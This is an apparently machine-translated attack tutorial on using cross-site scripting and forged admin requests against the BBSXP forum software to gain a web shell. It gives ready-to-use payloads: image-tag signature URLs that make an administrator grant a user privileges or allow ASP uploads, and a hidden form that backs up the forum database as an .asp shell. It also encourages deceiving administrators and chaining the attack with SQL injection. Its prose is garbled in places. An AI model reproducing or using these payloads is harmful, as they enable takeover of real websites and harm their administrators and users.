XSS Cross-Site Scripting

1. What is XSS attack?

XSS, also known as CSS (Cross Site Script), is a Cross-Site scripting attack. A malicious attacker inserts malicious html code into a Web page. When a user browses this page, the html code embedded in the Web page is executed, to achieve the Special Purpose of malicious users. XSS is a passive attack, because it is passive and not easy to use, so many people often call it harmful. This article mainly describes how to use XSS to obtain the shell of the target server. Although the technology is old, its ideas hope to help everyone.

How to find XSS vulnerabilities

Personally, XSS attacks are divided into two types: internal attacks, which mainly refer to the use of program vulnerabilities to construct cross-site statements, such as showerror of dvbbs. cross-Site vulnerabilities in asp. The other type is from external attacks. It mainly refers to constructing XSS Cross-Site vulnerability webpages or searching for webpages with cross-site vulnerabilities other than the target machines. For example, when we want to penetrate a website, we construct a webpage with cross-site vulnerabilities, and then construct cross-site statements. By combining other technologies, such as social engineering, the Administrator of the target server is spoofed to open it.

Then use the following technology to get a shell.

How to Use

In traditional cross-site exploitation methods, attackers usually construct a cross-site webpage, and then put a cookie-collecting page in another space, next, we use other technologies to enable users to open cross-site pages to steal users' cookies for further attacks. I personally think this method is too backward, and you may know the disadvantages, because even if you collect cookies, you may not be able to penetrate further. The passwords in most cookies are encrypted, if you want cookie spoofing, you will also be subject to other conditions. The other idea proposed in this article solves the above problems to a certain extent. For individuals, a mature method is to construct a form through cross-site, and the content of the form is to obtain a high permission by using the backup function of the program or adding the administrator. I will introduce this technology in detail below.

　　2. Internal cross-site attacks

Search for Cross-Site Vulnerabilities

If there is code, it is easy to do. We mainly look at the code to check whether there is a length and a pair of user input places and variables "<", "> ",";", whether to filter characters such. Note that tags are closed. For example, when you test cross-site vulnerabilities in a QQ group, enter <script> alert ('test') </script> in the title, the code will not be executed, because other labels in the source code are not closed, such as one missing </script>. At this time, you only need to close one </script>, the code will be executed. For example, enter </script> <script> alert ('test') </script> In the title to pop up a test box.

How to Use

Taking BBSXP as an example, the process has been made into an animation. For details, see the animation on the CD. Take two of BBSXP's useful cross-site vulnerabilities as an example.

A. register an ordinary user first. The user I registered here is linzi. Then we write in the personal signature: [img] http://127.0.0.1/bbsxp/admin_user.asp?menu=userok&username=linzi&membercode=5&userlife=1&posttopic=3&money=9&postrevert=0&savemoney=0&deltopic=1&regtime=2005-9-1+1%3A1%3A1&experience=9&country=%D6%D0%B9%FA&&Submit=+%B8%FC+%D0%C2+ [/Img] c. Then, you can send a post to cheat the postmaster by using other technologies. D. because it is a test, we log in as an administrator and open the post. We will find that linzi has become a community chief engineer, 1. In addition, you only need to enter [img] in your personal signature. http://127.0.0.1/bbsxp/admin_setup.asp?menu=variableok&clubname=+&homename=+&homeurl=&floor=2&PostTime=3&Timeout=6&OnlineTime=12&Reg10=10&style=1&selectup=FSO&MaxFace=10240&MaxPhoto=30720&MaxFile=102400&UpFileGenre=gif|jpg|asp%20|rar [/Img] also sends a post. Once the Administrator opens the post, an upload extension with the extension asp (with spaces) will be added. At this time, you only need to upload a newmm. asp (with spaces) can get a shell. the above attacks are more or less limited. Although shell can be obtained, the concealment is not very good because the signature is limited in length and cannot exceed 255 characters. We can combine flash with cross-site attacks to achieve more concealed attacks. For the production of flash Trojans, see the introduction of Buddy fengchu. Use the following code to modify the profile picture url: admin_setup.asp? [Tr] [td] menu = variableok & clubname = + & homename = + & homeurl = & floor = 2 & PostTime = 3 & Timeout = 6 & OnlineTime = 12 & Reg10 = 10 & style = 1 & selectup = FSO & MaxFace = 10240 & MaxPhoto = 30720 & MaxFile = 102400 & UpFileGenre = gif jpg php rar

The above code backs up the discussion database as shit. asp. The message board has the following cross-site:

Then, cheat the Administrator to open your documents or browse your posts. When the Administrator opens the posts, he will automatically add a post-renewal extension in the background, bbsxp filters spaces and % in the profile picture url, so we can only add other extensions that do not include spaces. Of course, you can also add a shtml extension, with it, you can view the source code and then perform further attacks.


Iii. Cross-Site attacks from outside

Sometimes, when we cannot find cross-site usable for the target program, we can use it to start from the outside. What we need to win is its discussion, the security of the discussion is very good, but its message board has a Cross-Site vulnerability. At this time, we can write cross-site statements in the message board, the cross-site statement is a form-based statement that submits elevation of permission to the Forum. The above statements are expanded by bbsxp and asp. Of course, we can use the back-end backup function to directly obtain a shell.

For example, first upload a file linzi.txt with the following content: <body> <formaction =" http://127.0.0.1/bbsxp/admin_fso.asp?menu=bakbf "Method =" post "> <input value =" database/bbsxp. mdb "name =" yl "> <input value =" database/shit. asp "name =" bf "> </body> When the Administrator opens the file, a shell is automatically backed up.

　　Iv. What is the relationship between XSS and other technologies?

From the above examples, we can know that it is a very important step to cheat management to open. In addition to social engineering, we can combine other technologies such as SQL injection. when we penetrate a website, the master site mssql injection vulnerability has the public permission. In this case, we use update to construct cross-site statements, for example, if you use iframe to open a backup to obtain the cross-site statement of shell, we can also use other cross-site vulnerabilities of QQ in social engineering.

It is always an art for deception. You can use your imagination to make full use of it!